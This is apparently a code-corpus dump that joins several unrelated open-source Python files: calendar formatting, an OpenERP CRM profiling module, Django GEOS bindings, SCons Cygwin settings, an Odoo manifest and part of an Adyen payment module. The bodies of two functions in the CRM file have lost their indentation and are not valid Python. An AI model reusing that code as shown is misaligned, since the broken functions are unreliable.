    cssclasses = ["mon", "tue", "wed", "thu", "fri", "sat", "sun"]

    def formatday(self, day, weekday):
        """
        Return a day as a table cell.
        """
        if day == 0:
            # NOTE(review): CPython's calendar uses '&nbsp;' here; the plain
            # space may be an artifact of how this copy was extracted --
            # confirm before relying on the rendered output.
            return '<td class="noday"> </td>' # day outside month
        else:
            return '<td class="%s">%d</td>' % (self.cssclasses[weekday], day)

    def formatweek(self, theweek):
        """
        Return a complete week as a table row.
        """
        s = ''.join(self.formatday(d, wd) for (d, wd) in theweek)
        return '<tr>%s</tr>' % s

    def formatweekday(self, day):
        """
        Return a weekday name as a table header.
        """
        return '<th class="%s">%s</th>' % (self.cssclasses[day], day_abbr[day])

    def formatweekheader(self):
        """
        Return a header for a week as a table row.
        """
        s = ''.join(self.formatweekday(i) for i in self.iterweekdays())
        return '<tr>%s</tr>' % s

    def formatmonthname(self, theyear, themonth, withyear=True):
        """
        Return a month name as a table row.
        """
        if withyear:
            s = '%s %s' % (month_name[themonth], theyear)
        else:
            s = '%s' % month_name[themonth]
        return '<tr><th colspan="7" class="month">%s</th></tr>' % s

    def formatmonth(self, theyear, themonth, withyear=True):
        """
        Return a formatted month as a table.
        """
        v = []
        a = v.append
        a('<table border="0" cellpadding="0" cellspacing="0" class="month">')
        a('\n')
        a(self.formatmonthname(theyear, themonth, withyear=withyear))
        a('\n')
        a(self.formatweekheader())
        a('\n')
        for week in self.monthdays2calendar(theyear, themonth):
            a(self.formatweek(week))
            a('\n')
        a('</table>')
        a('\n')
        return ''.join(v)

    def formatyear(self, theyear, width=3):
        """
        Return a formatted year as a table of tables.
        """
        v = []
        a = v.append
        width = max(width, 1)
        a('<table border="0" cellpadding="0" cellspacing="0" class="year">')
        a('\n')
        a('<tr><th colspan="%d" class="year">%s</th></tr>' % (width, theyear))
        for i in range(January, January+12, width):
            # months in this row
            months = range(i, min(i+width, 13))
            a('<tr>')
            for m in months:
                a('<td>')
                a(self.formatmonth(theyear, m, withyear=False))
                a('</td>')
            a('</tr>')
        a('</table>')
        return ''.join(v)

    def formatyearpage(self, theyear, width=3, css='calendar.css', encoding=None):
        """
        Return a formatted year as a complete HTML page.
        """
        if encoding is None:
            encoding = sys.getdefaultencoding()
        v = []
        a = v.append
        a('<?xml version="1.0" encoding="%s"?>\n' % encoding)
        a('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\n')
        a('<html>\n')
        a('<head>\n')
        a('<meta http-equiv="Content-Type" content="text/html; charset=%s" />\n' % encoding)
        if css is not None:
            a('<link rel="stylesheet" type="text/css" href="%s" />\n' % css)
        a('<title>Calendar for %d</title>\n' % theyear)
        a('</head>\n')
        a('<body>\n')
        a(self.formatyear(theyear, width))
        a('</body>\n')
        a('</html>\n')
        # Bytes are returned (not str) so the declared charset is honored.
        return ''.join(v).encode(encoding, "xmlcharrefreplace")
class different_locale:
    """Context manager that temporarily sets LC_TIME to *locale* and
    restores the previous setting on exit."""
    def __init__(self, locale):
        self.locale = locale

    def __enter__(self):
        # Save the current LC_TIME so __exit__ can restore it.
        self.oldlocale = _locale.getlocale(_locale.LC_TIME)
        _locale.setlocale(_locale.LC_TIME, self.locale)

    def __exit__(self, *args):
        _locale.setlocale(_locale.LC_TIME, self.oldlocale)
class LocaleTextCalendar(TextCalendar):
    """
    This class can be passed a locale name in the constructor and will return
    month and weekday names in the specified locale. If this locale includes
    an encoding all strings containing month and weekday names will be returned
    as unicode.
    """

    def __init__(self, firstweekday=0, locale=None):
        TextCalendar.__init__(self, firstweekday)
        self.locale = _locale.getdefaultlocale() if locale is None else locale

    def formatweekday(self, day, width):
        # Resolve and format the name while LC_TIME points at our locale.
        with different_locale(self.locale):
            source = day_name if width >= 9 else day_abbr
            return source[day][:width].center(width)

    def formatmonthname(self, theyear, themonth, width, withyear=True):
        with different_locale(self.locale):
            label = month_name[themonth]
            if withyear:
                label = "%s %r" % (label, theyear)
            return label.center(width)
class LocaleHTMLCalendar(HTMLCalendar):
    """
    This class can be passed a locale name in the constructor and will return
    month and weekday names in the specified locale. If this locale includes
    an encoding all strings containing month and weekday names will be returned
    as unicode.
    """

    def __init__(self, firstweekday=0, locale=None):
        HTMLCalendar.__init__(self, firstweekday)
        self.locale = _locale.getdefaultlocale() if locale is None else locale

    def formatweekday(self, day):
        # Resolve the localized name while LC_TIME points at our locale.
        with different_locale(self.locale):
            label = day_abbr[day]
            return '<th class="%s">%s</th>' % (self.cssclasses[day], label)

    def formatmonthname(self, theyear, themonth, withyear=True):
        with different_locale(self.locale):
            label = month_name[themonth]
            if withyear:
                label = '%s %s' % (label, theyear)
            return '<tr><th colspan="7" class="month">%s</th></tr>' % label
# Support for old module level interface
# A single shared TextCalendar instance backs all module-level functions.
c = TextCalendar()

firstweekday = c.getfirstweekday

def setfirstweekday(firstweekday):
    # Validate before mutating the shared calendar's state.
    if not MONDAY <= firstweekday <= SUNDAY:
        raise IllegalWeekdayError(firstweekday)
    c.firstweekday = firstweekday

# Module-level aliases for the shared instance's methods.
monthcalendar = c.monthdayscalendar
prweek = c.prweek
week = c.formatweek
weekheader = c.formatweekheader
prmonth = c.prmonth
month = c.formatmonth
calendar = c.formatyear
prcal = c.pryear
# Spacing of month columns for multi-column year calendar
_colwidth = 7*3 - 1         # Amount printed by prweek()
_spacing = 6                # Number of spaces between columns
def format(cols, colwidth=_colwidth, spacing=_spacing):
    """Prints multi-column formatting for year calendars"""
    print(formatstring(cols, colwidth, spacing))
def formatstring(cols, colwidth=_colwidth, spacing=_spacing):
    """Returns a string formatted from n strings, centered within n columns."""
    # Build the column separator once, then center every entry in its column.
    gap = ' ' * spacing
    return gap.join(entry.center(colwidth) for entry in cols)
EPOCH = 1970
_EPOCH_ORD = datetime.date(EPOCH, 1, 1).toordinal()
def timegm(tuple):
    """Unrelated but handy function to calculate Unix timestamp from GMT."""
    year, month, day, hour, minute, second = tuple[:6]
    # Days since the Unix epoch for the given calendar date...
    days = datetime.date(year, month, 1).toordinal() - _EPOCH_ORD + day - 1
    # ...then fold hours, minutes and seconds into a single second count.
    return ((days * 24 + hour) * 60 + minute) * 60 + second
def main(args):
    """Command-line entry point: print a text or HTML calendar.

    args is the full argv list (args[0] is the program name); the optional
    positional arguments are [year [month]].
    """
    import optparse
    parser = optparse.OptionParser(usage="usage: %prog [options] [year [month]]")
    parser.add_option(
        "-w", "--width",
        dest="width", type="int", default=2,
        help="width of date column (default 2, text only)"
    )
    parser.add_option(
        "-l", "--lines",
        dest="lines", type="int", default=1,
        help="number of lines for each week (default 1, text only)"
    )
    parser.add_option(
        "-s", "--spacing",
        dest="spacing", type="int", default=6,
        help="spacing between months (default 6, text only)"
    )
    parser.add_option(
        "-m", "--months",
        dest="months", type="int", default=3,
        help="months per row (default 3, text only)"
    )
    parser.add_option(
        "-c", "--css",
        dest="css", default="calendar.css",
        help="CSS to use for page (html only)"
    )
    parser.add_option(
        "-L", "--locale",
        dest="locale", default=None,
        help="locale to be used from month and weekday names"
    )
    parser.add_option(
        "-e", "--encoding",
        dest="encoding", default=None,
        help="Encoding to use for output."
    )
    parser.add_option(
        "-t", "--type",
        dest="type", default="text",
        choices=("text", "html"),
        help="output type (text or html)"
    )
    (options, args) = parser.parse_args(args)
    if options.locale and not options.encoding:
        # parser.error() already exits; the sys.exit(1) below is a
        # belt-and-braces fallback and is normally unreachable.
        parser.error("if --locale is specified --encoding is required")
        sys.exit(1)
    # Locale is passed around as a (name, encoding) pair.
    locale = options.locale, options.encoding
    if options.type == "html":
        if options.locale:
            cal = LocaleHTMLCalendar(locale=locale)
        else:
            cal = HTMLCalendar()
        encoding = options.encoding
        if encoding is None:
            encoding = sys.getdefaultencoding()
        optdict = dict(encoding=encoding, css=options.css)
        # HTML output is encoded bytes, so write through the binary buffer.
        write = sys.stdout.buffer.write
        if len(args) == 1:
            # No year given: default to the current year.
            write(cal.formatyearpage(datetime.date.today().year, **optdict))
        elif len(args) == 2:
            write(cal.formatyearpage(int(args[1]), **optdict))
        else:
            parser.error("incorrect number of arguments")
            sys.exit(1)
    else:
        if options.locale:
            cal = LocaleTextCalendar(locale=locale)
        else:
            cal = TextCalendar()
        optdict = dict(w=options.width, l=options.lines)
        if len(args) != 3:
            # Column spacing/months-per-row only apply to whole-year output.
            optdict["c"] = options.spacing
            optdict["m"] = options.months
        if len(args) == 1:
            result = cal.formatyear(datetime.date.today().year, **optdict)
        elif len(args) == 2:
            result = cal.formatyear(int(args[1]), **optdict)
        elif len(args) == 3:
            result = cal.formatmonth(int(args[1]), int(args[2]), **optdict)
        else:
            parser.error("incorrect number of arguments")
            sys.exit(1)
        write = sys.stdout.write
        if options.encoding:
            # Explicit encoding requested: emit bytes instead of text.
            result = result.encode(options.encoding)
            write = sys.stdout.buffer.write
        write(result)
if __name__ == "__main__":
    main(sys.argv)
|
BorgERP/borg-erp-6of3 | refs/heads/master | addons/crm_profiling/crm_profiling.py | 9 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from osv import fields,osv
from osv import orm
from tools.translate import _
def _get_answers(cr, uid, ids):
"""
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param ids: List of crm profiling’s IDs """
query = """
select distinct(answer)
from profile_question_yes_rel
where profile IN %s"""
cr.execute(query, (tuple(ids),))
ans_yes = [x[0] for x in cr.fetchall()]
query = """
select distinct(answer)
from profile_question_no_rel
where profile IN %s"""
cr.execute(query, (tuple(ids),))
ans_no = [x[0] for x in cr.fetchall()]
return [ans_yes, ans_no]
def _get_parents(cr, uid, ids):
"""
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param ids: List of crm profiling’s IDs
@return: Get parents's Id """
ids_to_check = ids
cr.execute("""
select distinct(parent_id)
from crm_segmentation
where parent_id is not null
and id IN %s""",(tuple(ids),))
parent_ids = [x[0] for x in cr.fetchall()]
trigger = False
for x in parent_ids:
if x not in ids_to_check:
ids_to_check.append(x)
trigger = True
if trigger:
ids_to_check = _get_parents(cr, uid, ids_to_check)
return ids_to_check
def test_prof(cr, uid, seg_id, pid, answers_ids=None):
    """ return True if the partner pid fetch the segmentation rule seg_id

    @param cr: the current row, from the database cursor,
    @param uid: the current user's ID for security checks,
    @param seg_id: Segmentation's ID
    @param pid: partner's ID
    @param answers_ids: Answers's IDs (defaults to an empty list)
    """
    # Use None as the default instead of a shared mutable list
    # (classic mutable-default-argument pitfall).
    if answers_ids is None:
        answers_ids = []
    ids_to_check = _get_parents(cr, uid, [seg_id])
    [yes_answers, no_answers] = _get_answers(cr, uid, ids_to_check)
    # Every required ('yes') answer must have been given by the partner...
    for y_ans in yes_answers:
        if y_ans not in answers_ids:
            return False
    # ...and none of the partner's answers may be in the excluded ('no') set.
    for ans in answers_ids:
        if ans in no_answers:
            return False
    return True
def _recompute_categ(self, cr, uid, pid, answers_ids):
    """Recompute the partner's category ids from the profiling rules.

    @param self: The object pointer
    @param cr: the current row, from the database cursor,
    @param uid: the current user's ID for security checks,
    @param pid: partner's ID
    @param answers_ids: Answers's IDs
    @return: list of category ids the partner should carry
    """
    # Start from the categories the partner already has through
    # non-exclusive (or non-profiling) segmentations.
    cr.execute('''
        select r.category_id
        from res_partner_category_rel r left join crm_segmentation s on (r.category_id = s.categ_id)
        where r.partner_id = %s and (s.exclusif = false or s.exclusif is null)
        ''', (pid,))
    ok = [row[0] for row in cr.fetchall()]
    # Then evaluate every active profiling segmentation whose category
    # is not already kept; integer ids only, so the join below is safe.
    query = '''
        select id, categ_id
        from crm_segmentation
        where profiling_active = true'''
    if ok != []:
        query = query +''' and categ_id not in(%s)'''% ','.join([str(i) for i in ok ])
    query = query + ''' order by id '''
    cr.execute(query)
    for segm_id, cat_id in cr.fetchall():
        if test_prof(cr, uid, segm_id, pid, answers_ids):
            ok.append(cat_id)
    return ok
class question(osv.osv):
    """ Question

    A single profiling question; its possible answers live in
    crm_profiling.answer via the one2many below.
    """
    _name="crm_profiling.question"
    _description= "Question"
    _columns={
        'name': fields.char("Question",size=128, required=True),
        # Label typo fixed: "Avalaible" -> "Available".
        'answers_ids': fields.one2many("crm_profiling.answer","question_id","Available answers",),
        }
question()
class questionnaire(osv.osv):
    """ Questionnaire

    A named, described set of profiling questions that can be run
    against a partner (m2m through profile_questionnaire_quest_rel).
    """
    _name="crm_profiling.questionnaire"
    _description= "Questionnaire"
    _columns = {
        'name': fields.char("Questionnaire",size=128, required=True),
        'description':fields.text("Description", required=True),
        'questions_ids': fields.many2many('crm_profiling.question','profile_questionnaire_quest_rel',\
                            'questionnaire', 'question', "Questions"),
        }
questionnaire()
class answer(osv.osv):
    # One possible answer to a profiling question (many answers per question).
    _name="crm_profiling.answer"
    _description="Answer"
    _columns={
        "name": fields.char("Answer",size=128, required=True),
        "question_id": fields.many2one('crm_profiling.question',"Question"),
        }
answer()
class partner(osv.osv):
    # Extend res.partner with the profiling answers it has given;
    # writing answers_ids triggers a category recomputation (see write()).
    _inherit="res.partner"
    _columns={
        "answers_ids": fields.many2many("crm_profiling.answer","partner_question_rel",\
                        "partner","answer","Answers"),
        }

    def _questionnaire_compute(self, cr, uid, answers, context=None):
        """Merge the given answers with the partner's stored ones and save.

        @param self: The object pointer
        @param cr: the current row, from the database cursor,
        @param uid: the current user's ID for security checks,
        @param answers: list of answer ids to add (mutated in place)
        @param context: A standard dictionary for contextual values;
                        the target partner comes from context['active_id'] """
        partner_id = context.get('active_id')
        # Collect the answers the partner already has...
        query = "select answer from partner_question_rel where partner=%s"
        cr.execute(query, (partner_id,))
        for x in cr.fetchall():
            answers.append(x[0])
        # ...and replace the whole set with the merged list ((6, 0, ids) command).
        self.write(cr, uid, [partner_id], {'answers_ids': [[6, 0, answers]]}, context=context)
        return {}

    def write(self, cr, uid, ids, vals, context=None):
        """Recompute partner categories whenever the answers change.

        @param self: The object pointer
        @param cr: the current row, from the database cursor,
        @param uid: the current user's ID for security checks,
        @param ids: List of crm profiling's IDs
        @param context: A standard dictionary for contextual values """
        if 'answers_ids' in vals:
            # NOTE(review): assumes vals['answers_ids'] is a single
            # (6, 0, ids) replace command and only recomputes for ids[0]
            # — confirm callers always write answers that way.
            vals['category_id']=[[6, 0, _recompute_categ(self, cr, uid, ids[0], vals['answers_ids'][0][2])]]
        return super(partner, self).write(cr, uid, ids, vals, context=context)
partner()
class crm_segmentation(osv.osv):
    """ CRM Segmentation

    Extends crm.segmentation with profiling criteria: included/excluded
    answers and a parent/child profile hierarchy (recursion forbidden).
    """
    _inherit="crm.segmentation"
    _columns={
        "answer_yes": fields.many2many("crm_profiling.answer","profile_question_yes_rel",\
                        "profile","answer","Included Answers"),
        "answer_no": fields.many2many("crm_profiling.answer","profile_question_no_rel",\
                        "profile","answer","Excluded Answers"),
        'parent_id': fields.many2one('crm.segmentation', 'Parent Profile'),
        'child_ids': fields.one2many('crm.segmentation', 'parent_id', 'Child Profiles'),
        'profiling_active': fields.boolean('Use The Profiling Rules', help='Check\
                             this box if you want to use this tab as part of the \
                             segmentation rule. If not checked, the criteria beneath will be ignored')
        }

    _constraints = [
        (osv.osv._check_recursion, 'Error ! You can not create recursive profiles.', ['parent_id'])
    ]

    def process_continue(self, cr, uid, ids, start=False):
        """Assign partners to each segmentation's category.

        Starts (or resumes) the segmentation run: filters all partners
        through the sales/purchase lines and the profiling rules, then
        links the survivors to the segmentation's category.

        @param self: The object pointer
        @param cr: the current row, from the database cursor,
        @param uid: the current user's ID for security checks,
        @param ids: List of crm segmentation's IDs """
        categs = self.read(cr,uid,ids,['categ_id','exclusif','partner_id', \
                                'sales_purchase_active', 'profiling_active'])
        for categ in categs:
            if start:
                # Exclusive segmentations own their category: clear all
                # existing partner links before re-assigning.
                if categ['exclusif']:
                    cr.execute('delete from res_partner_category_rel where \
                            category_id=%s', (categ['categ_id'][0],))

            id = categ['id']

            cr.execute('select id from res_partner order by id ')
            partners = [x[0] for x in cr.fetchall()]

            # First filter: sales/purchase criteria lines.
            if categ['sales_purchase_active']:
                to_remove_list=[]
                cr.execute('select id from crm_segmentation_line where segmentation_id=%s', (id,))
                line_ids = [x[0] for x in cr.fetchall()]

                for pid in partners:
                    if (not self.pool.get('crm.segmentation.line').test(cr, uid, line_ids, pid)):
                        to_remove_list.append(pid)
                for pid in to_remove_list:
                    partners.remove(pid)

            # Second filter: profiling answers (included/excluded).
            if categ['profiling_active']:
                to_remove_list = []
                for pid in partners:
                    cr.execute('select distinct(answer) from partner_question_rel where partner=%s',(pid,))
                    answers_ids = [x[0] for x in cr.fetchall()]

                    if (not test_prof(cr, uid, id, pid, answers_ids)):
                        to_remove_list.append(pid)
                for pid in to_remove_list:
                    partners.remove(pid)

            # Link every surviving partner to the segmentation's category.
            for partner_id in partners:
                cr.execute('insert into res_partner_category_rel (category_id,partner_id) values (%s,%s)', (categ['categ_id'][0],partner_id))

            self.write(cr, uid, [id], {'state':'not running', 'partner_id':0})
        return True
crm_segmentation()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
rickhurst/Django-non-rel-blog | refs/heads/master | django/contrib/gis/geos/prototypes/topology.py | 311 | """
This module houses the GEOS ctypes prototype functions for the
topological operations on geometries.
"""
__all__ = ['geos_boundary', 'geos_buffer', 'geos_centroid', 'geos_convexhull',
'geos_difference', 'geos_envelope', 'geos_intersection',
'geos_linemerge', 'geos_pointonsurface', 'geos_preservesimplify',
'geos_simplify', 'geos_symdifference', 'geos_union', 'geos_relate']
from ctypes import c_char_p, c_double, c_int
from django.contrib.gis.geos.libgeos import GEOM_PTR, GEOS_PREPARE
from django.contrib.gis.geos.prototypes.errcheck import check_geom, check_string
from django.contrib.gis.geos.prototypes.geom import geos_char_p
from django.contrib.gis.geos.prototypes.threadsafe import GEOSFunc
def topology(func, *args):
    "For GEOS unary topology functions."
    # All topology routines take a geometry pointer first, optionally
    # followed by extra ctypes argument types, and produce a new geometry.
    func.argtypes = [GEOM_PTR] + list(args)
    func.restype = GEOM_PTR
    func.errcheck = check_geom
    return func
### Topology Routines ###
# Unary routines: geometry in, geometry out.
geos_boundary = topology(GEOSFunc('GEOSBoundary'))
# Buffer takes a width (double) and quadsegs (int) in addition to the geometry.
geos_buffer = topology(GEOSFunc('GEOSBuffer'), c_double, c_int)
geos_centroid = topology(GEOSFunc('GEOSGetCentroid'))
geos_convexhull = topology(GEOSFunc('GEOSConvexHull'))
# Binary routines: second geometry pointer as extra argument.
geos_difference = topology(GEOSFunc('GEOSDifference'), GEOM_PTR)
geos_envelope = topology(GEOSFunc('GEOSEnvelope'))
geos_intersection = topology(GEOSFunc('GEOSIntersection'), GEOM_PTR)
geos_linemerge = topology(GEOSFunc('GEOSLineMerge'))
geos_pointonsurface = topology(GEOSFunc('GEOSPointOnSurface'))
# Simplification routines take a tolerance (double).
geos_preservesimplify = topology(GEOSFunc('GEOSTopologyPreserveSimplify'), c_double)
geos_simplify = topology(GEOSFunc('GEOSSimplify'), c_double)
geos_symdifference = topology(GEOSFunc('GEOSSymDifference'), GEOM_PTR)
geos_union = topology(GEOSFunc('GEOSUnion'), GEOM_PTR)
# GEOSRelate returns a string, not a geometry.
geos_relate = GEOSFunc('GEOSRelate')
geos_relate.argtypes = [GEOM_PTR, GEOM_PTR]
geos_relate.restype = geos_char_p
geos_relate.errcheck = check_string
# Routines only in GEOS 3.1+
if GEOS_PREPARE:
    geos_cascaded_union = GEOSFunc('GEOSUnionCascaded')
    geos_cascaded_union.argtypes = [GEOM_PTR]
    geos_cascaded_union.restype = GEOM_PTR
    __all__.append('geos_cascaded_union')
|
mjkoster/HypermediaToolkit | refs/heads/master | MachineHypermediaToolkit/server/coap/__init__.py | 12133432 | |
MatthewWilkes/django | refs/heads/master | tests/admin_scripts/custom_templates/project_template/project_name/__init__.py | 12133432 | |
looooo/pivy | refs/heads/master | scons/scons-local-1.2.0.d20090919/SCons/Platform/cygwin.py | 2 | """SCons.Platform.cygwin
Platform-specific initialization for Cygwin systems.
There normally shouldn't be any need to import this module directly. It
will usually be imported through the generic SCons.Platform.Platform()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Platform/cygwin.py 4369 2009/09/19 15:58:29 scons"
import posix
from SCons.Platform import TempFileMunge
def generate(env):
    """Populate *env* with Cygwin platform defaults on top of POSIX ones."""
    posix.generate(env)
    # Windows-style program and shared-library naming, plus the long
    # command-line workaround via temp files.
    cygwin_settings = {
        'PROGPREFIX': '',
        'PROGSUFFIX': '.exe',
        'SHLIBPREFIX': '',
        'SHLIBSUFFIX': '.dll',
        'LIBPREFIXES': ['$LIBPREFIX', '$SHLIBPREFIX'],
        'LIBSUFFIXES': ['$LIBSUFFIX', '$SHLIBSUFFIX'],
        'TEMPFILE': TempFileMunge,
        'TEMPFILEPREFIX': '@',
        'MAXLINELENGTH': 2048,
    }
    for key, value in cygwin_settings.items():
        env[key] = value
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
fuselock/odoo | refs/heads/8.0 | addons/gamification_sale_crm/__openerp__.py | 320 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013 OpenERP SA (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
    'name': 'CRM Gamification',
    'version': '1.0',
    'author': 'OpenERP SA',
    # 'hidden' keeps the module out of the apps listing.
    'category': 'hidden',
    'depends': ['gamification','sale_crm'],
    'website' : 'https://www.odoo.com/page/gamification',
    'description': """Example of goal definitions and challenges that can be used related to the usage of the CRM Sale module.""",
    'data': ['sale_crm_goals.xml'],
    'demo': ['sale_crm_goals_demo.xml'],
    # Installed automatically once all dependencies are present.
    'auto_install': True,
}
|
sodexis/odoo | refs/heads/8.0 | addons/payment_adyen/models/adyen.py | 165 | # -*- coding: utf-'8' "-*-"
import base64
try:
import simplejson as json
except ImportError:
import json
from hashlib import sha1
import hmac
import logging
import urlparse
from openerp.addons.payment.models.payment_acquirer import ValidationError
from openerp.addons.payment_adyen.controllers.main import AdyenController
from openerp.osv import osv, fields
from openerp.tools import float_round
_logger = logging.getLogger(__name__)
class AcquirerAdyen(osv.Model):
    """payment.acquirer extension implementing the Adyen hosted payment page."""
    _inherit = 'payment.acquirer'

    def _get_adyen_urls(self, cr, uid, environment, context=None):
        """ Adyen URLs
         - yhpp: hosted payment page: pay.shtml for single, select.shtml for multiple
        """
        # 'prod' maps to Adyen's 'live' subdomain; other environments
        # (e.g. 'test') are used verbatim.
        return {
            'adyen_form_url': 'https://%s.adyen.com/hpp/pay.shtml' % ('live' if environment == 'prod' else environment),
        }

    def _get_providers(self, cr, uid, context=None):
        # Register 'adyen' in the provider selection field.
        providers = super(AcquirerAdyen, self)._get_providers(cr, uid, context=context)
        providers.append(['adyen', 'Adyen'])
        return providers

    _columns = {
        'adyen_merchant_account': fields.char('Merchant Account', required_if_provider='adyen'),
        'adyen_skin_code': fields.char('Skin Code', required_if_provider='adyen'),
        'adyen_skin_hmac_key': fields.char('Skin HMAC Key', required_if_provider='adyen'),
    }

    def _adyen_generate_merchant_sig(self, acquirer, inout, values):
        """ Generate the shasign for incoming or outgoing communications.

        The signature is an HMAC-SHA1 (base64-encoded) over the
        concatenation of the relevant field values, keyed with the skin
        HMAC key. The field list differs by direction.

        :param browse acquirer: the payment.acquirer browse record. It should
                                have a shakey in shaky out
        :param string inout: 'in' (openerp contacting ogone) or 'out' (adyen
                             contacting openerp). In this last case only some
                             fields should be contained (see e-Commerce basic)
        :param dict values: transaction values

        :return string: shasign
        """
        assert inout in ('in', 'out')
        assert acquirer.provider == 'adyen'

        if inout == 'in':
            keys = "paymentAmount currencyCode shipBeforeDate merchantReference skinCode merchantAccount sessionValidity shopperEmail shopperReference recurringContract allowedMethods blockedMethods shopperStatement merchantReturnData billingAddressType deliveryAddressType offset".split()
        else:
            keys = "authResult pspReference merchantReference skinCode merchantReturnData".split()

        def get_value(key):
            # Falsy values (missing, empty, 0) contribute an empty string.
            if values.get(key):
                return values[key]
            return ''

        sign = ''.join('%s' % get_value(k) for k in keys).encode('ascii')
        key = acquirer.adyen_skin_hmac_key.encode('ascii')
        return base64.b64encode(hmac.new(key, sign, sha1).digest())

    def adyen_form_generate_values(self, cr, uid, id, partner_values, tx_values, context=None):
        """Build the POST values for the Adyen hosted payment form."""
        base_url = self.pool['ir.config_parameter'].get_param(cr, uid, 'web.base.url')
        acquirer = self.browse(cr, uid, id, context=context)
        # tmp
        import datetime
        from dateutil import relativedelta
        # Ship-before and session-validity are hardcoded to tomorrow.
        tmp_date = datetime.date.today() + relativedelta.relativedelta(days=1)
        adyen_tx_values = dict(tx_values)
        adyen_tx_values.update({
            'merchantReference': tx_values['reference'],
            # Adyen expects the amount in minor units (cents).
            'paymentAmount': '%d' % int(float_round(tx_values['amount'], 2) * 100),
            'currencyCode': tx_values['currency'] and tx_values['currency'].name or '',
            'shipBeforeDate': tmp_date,
            'skinCode': acquirer.adyen_skin_code,
            'merchantAccount': acquirer.adyen_merchant_account,
            'shopperLocale': partner_values['lang'],
            'sessionValidity': tmp_date,
            'resURL': '%s' % urlparse.urljoin(base_url, AdyenController._return_url),
        })
        if adyen_tx_values.get('return_url'):
            # Round-trip the return URL through Adyen's merchantReturnData.
            adyen_tx_values['merchantReturnData'] = json.dumps({'return_url': '%s' % adyen_tx_values.pop('return_url')})
        adyen_tx_values['merchantSig'] = self._adyen_generate_merchant_sig(acquirer, 'in', adyen_tx_values)
        return partner_values, adyen_tx_values

    def adyen_get_form_action_url(self, cr, uid, id, context=None):
        # URL the payment form posts to, per the acquirer's environment.
        acquirer = self.browse(cr, uid, id, context=context)
        return self._get_adyen_urls(cr, uid, acquirer.environment, context=context)['adyen_form_url']
class TxAdyen(osv.Model):
    """payment.transaction extension handling Adyen form feedback."""
    _inherit = 'payment.transaction'

    _columns = {
        'adyen_psp_reference': fields.char('Adyen PSP Reference'),
    }

    # --------------------------------------------------
    # FORM RELATED METHODS
    # --------------------------------------------------

    def _adyen_form_get_tx_from_data(self, cr, uid, data, context=None):
        """Find and authenticate the transaction matching Adyen's feedback.

        Raises ValidationError when the reference is missing, the
        transaction cannot be uniquely resolved, or the signature check
        fails.
        """
        reference, pspReference = data.get('merchantReference'), data.get('pspReference')
        if not reference or not pspReference:
            error_msg = 'Adyen: received data with missing reference (%s) or missing pspReference (%s)' % (reference, pspReference)
            _logger.error(error_msg)
            raise ValidationError(error_msg)

        # find tx -> @TDENOTE use pspReference ?
        tx_ids = self.pool['payment.transaction'].search(cr, uid, [('reference', '=', reference)], context=context)
        if not tx_ids or len(tx_ids) > 1:
            error_msg = 'Adyen: received data for reference %s' % (reference)
            if not tx_ids:
                error_msg += '; no order found'
            else:
                error_msg += '; multiple order found'
            _logger.error(error_msg)
            raise ValidationError(error_msg)
        tx = self.pool['payment.transaction'].browse(cr, uid, tx_ids[0], context=context)

        # verify shasign: recompute the outgoing signature and compare.
        shasign_check = self.pool['payment.acquirer']._adyen_generate_merchant_sig(tx.acquirer_id, 'out', data)
        if shasign_check != data.get('merchantSig'):
            error_msg = 'Adyen: invalid merchantSig, received %s, computed %s' % (data.get('merchantSig'), shasign_check)
            _logger.warning(error_msg)
            raise ValidationError(error_msg)

        return tx

    def _adyen_form_get_invalid_parameters(self, cr, uid, tx, data, context=None):
        """Return (name, received, expected) tuples for mismatched fields."""
        invalid_parameters = []

        # reference at acquirer: pspReference
        if tx.acquirer_reference and data.get('pspReference') != tx.acquirer_reference:
            invalid_parameters.append(('pspReference', data.get('pspReference'), tx.acquirer_reference))
